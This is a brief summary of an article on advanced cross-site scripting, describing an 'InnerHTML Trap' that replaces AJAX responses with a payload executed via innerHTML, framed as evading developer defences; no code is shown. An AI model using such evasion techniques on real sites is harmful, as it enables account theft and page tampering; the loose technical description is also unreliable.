As web browser security has become more sophisticated, so has the need for more sophisticated cross-site scripting (XSS) attacks.
Basic attacks such as simple exfiltration of data or triggering an alert box are likely to be spotted by developers during testing and blocked in production code.
This article highlights some advanced methodologies that are less likely to be blocked, notably “The InnerHTML Trap”, so called because it abuses the functionality of the InnerHTML property.
This technique works by intercepting the loading of an AJAX- Calls and replacing the requested data with a malicious payload, which then gets written into the page as HTML and executed.
The article includes a short piece of Python code which illustrates this technique.